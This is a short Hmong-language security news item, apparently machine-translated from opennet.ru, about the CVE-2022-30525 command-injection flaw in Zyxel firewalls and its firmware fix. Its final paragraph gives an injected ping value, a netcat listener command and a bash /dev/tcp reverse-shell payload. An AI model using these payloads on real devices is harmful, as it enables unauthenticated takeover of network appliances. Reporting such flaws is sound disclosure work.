Qhov teeb meem tseem ceeb (CVE-2022-30525) tau raug txheeb xyuas hauv Zyxel cov cuab yeej ntawm ATP, VPN thiab USG FLEX series, tsim los txhim kho kev ua haujlwm ntawm firewalls, IDS thiab VPN hauv kev lag luam, uas tso cai rau tus neeg tawm tsam sab nraud los tua cov cai ntawm lub ntaus ntawv tsis muaj neeg siv txoj cai yam tsis muaj authentication. Txhawm rau ua qhov kev tawm tsam, tus neeg tawm tsam yuav tsum tuaj yeem xa cov lus thov mus rau lub cuab yeej siv HTTP / HTTPS raws tu qauv. Zyxel tau kho qhov tsis zoo hauv ZLD 5.30 firmware hloov tshiab. Raws li cov kev pabcuam Shodan, tam sim no muaj 16213 cov khoom siv uas muaj peev xwm ua tau zoo ntawm lub ntiaj teb network uas lees txais kev thov los ntawm HTTP / HTTPS.
Kev ua haujlwm yog ua los ntawm kev xa cov lus txib tsim tshwj xeeb rau lub web handler /ztp/cgi-bin/handler, siv tau yam tsis muaj kev lees paub. Qhov teeb meem yog tshwm sim los ntawm qhov tsis muaj kev tu kom zoo ntawm kev thov tsis raug thaum ua tiav cov lus txib ntawm lub kaw lus siv os.system hu siv hauv lib_wan_settings.py lub tsev qiv ntawv thiab raug tua thaum ua haujlwm setWanPortSt.
Piv txwv li, tus neeg tawm tsam tuaj yeem hla txoj hlua "; ping 192.168.1.210;" uas yuav ua rau kev ua tiav ntawm "ping 192.168.1.210" hais kom ua ntawm lub kaw lus. Txhawm rau nkag mus rau lub plhaub hais kom ua, koj tuaj yeem khiav "nc -lvnp 1270" ntawm koj lub cev, thiab tom qab ntawd pib qhov kev sib txuas rov qab los ntawm kev xa daim ntawv thov mus rau lub cuab yeej nrog '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
Tau qhov twg los: opennet.ru